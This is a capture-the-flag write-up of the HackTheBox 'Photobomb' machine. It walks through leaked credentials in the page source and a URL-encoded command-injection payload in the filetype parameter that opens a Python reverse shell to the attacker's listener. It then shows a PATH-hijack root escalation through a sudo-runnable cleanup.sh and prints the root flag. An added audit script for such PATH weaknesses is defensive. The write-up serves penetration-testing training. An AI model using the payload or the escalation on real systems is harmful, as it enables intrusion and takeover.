Photobomb — HackTheBox Machine Simple Writeup | 2023

HackTheBox’s Photobomb Machine — Simple writeup | Karthikeyan Nagaraj

Karthikeyan Nagaraj
InfoSec Write-ups


Machine Link — Access the Machine Here

Make sure to connect to the HackTheBox VPN before starting.

Analysis:

1. Let's perform an nmap scan, directory enumeration and subdomain enumeration first

Open ports

22 - ssh
80 - http

2. Let's enumerate HTTP
Make sure to add photobomb.htb to your hosts file using the command below

3. On inspecting the source code we find something interesting

http://pH0t0:b0Mb!@photobomb.htb/printer

Seems like a username and password: pH0t0:b0Mb!

4. Let's try to log in with the creds

We are logged in : )

But there seems to be nothing interesting

5. Let's intercept the request through Burp

If you test each parameter with command execution payloads, you'll find that commands can be injected via the filetype parameter, which can be used to get a reverse shell

6. Let's start the netcat listener and use the payload

The payload to be injected into the filetype parameter is mentioned below

Make sure to replace the IP address and the port with those used by your netcat listener

%3bexport+RHOST%3d"10.10.14.35"%3bexport+RPORT%3d2929%3bpython3+-c+'import+sys,socket,os,pty%3bs%3dsocket.socket()%3bs.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))%3b[os.dup2(s.fileno(),fd)+for+fd+in+(0,1,2)]%3bpty.spawn("sh")'

7. Send the request with the payload in the filetype parameter

8. We got the reverse connection. Before we start, let's get an interactive shell using the command below

python3 -c "import pty;pty.spawn('/bin/bash')" 

9. Now let's try to escalate the session to root privileges

We can use linpeas to find a way to In

LinPEAS is a popular tool used to search for possible paths to escalate privileges on Linux, Unix and macOS hosts.

It seems we can run cleanup.sh with root permission via sudo. So let's view the contents of cleanup.sh for any possibility of gaining root privileges

cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

10. The script calls find by bare name, so let's put bash in a file named find in our own directory and execute the script with root permission, prepending that directory to PATH

wizard@photobomb:~/photobomb$ echo bash > find
echo bash > find

wizard@photobomb:~/photobomb$ chmod +x find
chmod +x find

wizard@photobomb:~/photobomb$ sudo PATH=$PWD:$PATH /opt/cleanup.sh
sudo PATH=$PWD:$PATH /opt/cleanup.sh

root@photobomb:/home/wizard/photobomb# cat /root/root.txt
cat /root/root.txt
17efb291c8f2de7f3feae82386cb07c4
Flag: 17efb291c8f2de7f3feae82386cb07c4
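The escalation above works because cleanup.sh resolves find through PATH. As an added example (not part of the original writeup), here is a small audit that reports every command a privileged script runs by bare name and whether the script pins PATH itself; the file it scans is a constructed copy of the /opt/cleanup.sh shown above, and bare_commands and pins_path are helper names chosen here.

```shell
#!/bin/sh
# Added example: audit a sudo-runnable script for PATH-resolved commands.
# CLEANUP_SCRIPT is a constructed copy of the /opt/cleanup.sh shown in the writeup.
CLEANUP_SCRIPT=$(mktemp)
trap 'rm -f "$CLEANUP_SCRIPT"' EXIT
cat > "$CLEANUP_SCRIPT" <<'EOF'
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
EOF

# Shell keywords and builtins: these never resolve through PATH.
BUILTINS=' if then else elif fi for do done while until case esac cd export . [ ! set unset echo '

# Print every command the script runs by bare name (hijackable via PATH), sorted.
# Comments and find's "\;" are dropped, then each simple command is examined:
# its first word, plus the word after any -exec.
bare_commands() {
    sed -e 's/#.*$//' -e 's/\\;//g' "$1" |
    tr ';|&' '\n' |
    awk '{
        if ($1 != "") print $1
        for (i = 1; i < NF; i++) if ($i == "-exec") print $(i + 1)
    }' |
    while read -r cmd; do
        case "$cmd" in
            /*) ;;                                  # absolute path: fine
            *)  case "$BUILTINS" in
                    *" $cmd "*) ;;                  # builtin or keyword: fine
                    *) printf '%s\n' "$cmd" ;;
                esac ;;
        esac
    done | sort -u
}

# Succeeds only if the script sets PATH itself before running commands.
pins_path() { grep -Eq '^[[:space:]]*(export[[:space:]]+)?PATH=' "$1"; }

echo "Commands resolved via PATH in the audited script:"
bare_commands "$CLEANUP_SCRIPT"
pins_path "$CLEANUP_SCRIPT" || echo "PATH is not pinned by the script itself"
```

For the copy of cleanup.sh above the audit reports chown and find; using /usr/bin/find and /usr/bin/chown, or setting PATH at the top of the script, removes what step 10 relies on.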

Feel free to ask queries via LinkedIn and to buy me a coffee : )

Thank you for Reading!!

Happy Hacking ~

Author: Karthikeyan Nagaraj ~ Cyberw1ng
